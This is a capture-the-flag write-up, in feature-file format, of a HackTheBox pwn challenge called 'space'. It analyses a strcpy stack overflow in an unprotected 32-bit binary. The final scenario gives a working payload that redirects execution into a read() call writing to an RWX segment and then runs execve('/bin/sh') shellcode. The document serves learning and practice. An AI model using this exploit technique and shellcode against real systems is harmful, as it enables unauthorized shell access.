## Version 2.0
## language: en

Feature: space
  Site:
    Hackthebox
  Category:
    Pwn
  User:
    lkkpp
  Goal:
    Get shell and read the flag

  Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 16.04.4   |
    | gdb-gef         | 1.1.0     |
    | VMware          | 15.5.6    |
    | Python          | 3.6.9     |
    | Ghidra          | 9.1.2     |
    | Windows         | 10        |

  Machine information:
    Given I am accessing the challenge through its section
    When I open the challenge section
    Then I see a the following description
    """
    roaming in a small space
    """
    And it is possible to download the challenge

  Scenario: Sucess:Analyze the binary and finding bugs
    Given the source code is not provided
    When I downloaded the binary
    And I get information from the challenge
    """
    $ file space
    space: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
    dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux
    3.2.0, BuildID[sha1]=90e5767272e16e26e1980cb78be61437b3d63e12, not stripped
    """
    Then I analyze it with Ghidra [evidences](main.png)
    """
    undefined4 main(void)

    {
      undefined local_2f [31];
      undefined *local_10;

      local_10 = &stack0x00000004;
      printf("> ");
      fflush(stdout);
      read(0,local_2f,0x1f);     0x1f (31d)
      vuln(local_2f);
      return 0;
    }
    """
    And there is a function called "vuln" that contains a Stack Buffer Overflow
    """
    void vuln(char *param_1)

    {
      char buf [10];

      __x86.get_pc_thunk.ax();
      strcpy(buf,param_1);
      return;
    }
    """ [evidences](bufferoverflow.png)
    When I analyze this, triggering the vulnerability is very simple
    And this is because read() reads 31 bytes from STDIN
    Then vuln function copies the bytes to a local 10-byte buffer

  Scenario: Fail: Exploiting the Stack Buffer Overflow to get shell
    Given I recognize the vulnerability
    When I check the binary protections [evidences](noprotections.png)
    """
    gef> checksec
    [+] checksec for 'space'
    Canary                        : x
    NX                            : x
    PIE                           : x
    Fortify                       : x
    RelRO                         : x
    """
    And I realize that the binary has no protection
    When I think of a traditional way to exploit it
    And I realize I don't have enough space to spawn a shellcode
    """
    char buf [10];

    __x86.get_pc_thunk.ax();
    strcpy(buf,param_1);
    return;
    """
    Then I need to find another way since so far there is no 10 byte shellcode

  Scenario: Success: Exploiting the binary with Ret2Text
    Given most segments are RWX
    """
    gef> vmmap
    0x08048000 0x0804b000 0x00000000 r-x space
    0x0804b000 0x0804c000 0x00002000 rwx space
    0xf7ddd000 0xf7fb2000 0x00000000 r-x /lib/i386-linux-gnu/libc-2.27.so
    0xf7fb2000 0xf7fb3000 0x001d5000 --- /lib/i386-linux-gnu/libc-2.27.so
    0xf7fb3000 0xf7fb5000 0x001d5000 r-x /lib/i386-linux-gnu/libc-2.27.so
    0xf7fb5000 0xf7fb6000 0x001d7000 rwx /lib/i386-linux-gnu/libc-2.27.so
    0xf7fb6000 0xf7fb9000 0x00000000 rwx
    0xf7fcf000 0xf7fd1000 0x00000000 rwx
    0xf7fd1000 0xf7fd4000 0x00000000 r-- [vvar]
    0xf7fd4000 0xf7fd6000 0x00000000 r-x [vdso]
    0xf7fd6000 0xf7ffc000 0x00000000 r-x /lib/i386-linux-gnu/ld-2.27.so
    0xf7ffc000 0xf7ffd000 0x00025000 r-x /lib/i386-linux-gnu/ld-2.27.so
    0xf7ffd000 0xf7ffe000 0x00026000 rwx /lib/i386-linux-gnu/ld-2.27.so
    0xfffdd000 0xffffe000 0x00000000 rwx [stack]
    gef>
    """
    When I analyze the binary a little more
    And I notice a primitive that allows me to put bytes in a static segment
    """
    08049217 8d 45 d9        LEA        EAX=>local_2f,[EBP + -0x27]
    0804921a 50              PUSH       EAX
    0804921b 6a 00           PUSH       0x0
    0804921d e8 0e fe        CALL       read   ssize_t read(int __fd, void * __
    """
    Then I put the shellcode in a writable section
    """
    payload = b''
    payload += b'A' * 14
    payload += p32(0x0804b927) # Writable section
    payload += p32(0x08049217) # primitive
    payload += p32(0x1337) # read size
    """
    When I did this everything was easier
    Then I just call the writable address (shellcode)
    """
    payload += b'A' * 23
    payload += p32(0x804b916) # begin the shellcode
    payload += b'\x31\xc0\x50\x68\x2f\x2f\x73'
    payload += b'\x68\x68\x2f\x62\x69\x6e\x89'
    payload += b'\xe3\x89\xc1\x89\xc2\xb0\x0b'
    payload += b'\xcd\x80\x31\xc0\x40\xcd\x80'
    """
    Then that way to get pwnear the binary [evidences](pwned.png)
